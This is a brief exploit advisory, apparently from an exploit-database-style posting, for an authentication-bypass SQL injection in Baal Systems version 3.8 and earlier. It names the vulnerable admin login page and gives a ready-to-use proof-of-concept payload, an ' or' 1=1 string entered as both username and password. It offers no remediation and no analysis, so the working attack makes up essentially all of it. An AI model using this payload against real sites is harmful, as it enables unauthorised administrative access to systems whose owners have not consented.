[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r [+] Download : http://scripts.ringsworld.com/discussion-boards/baalsystems3-8/ [+] Vuln Code : [adminlogin.php] [+] PoC : [BaalSystems_path]/adminlogin.php username: ' or' 1=1 Password: ' or' 1=1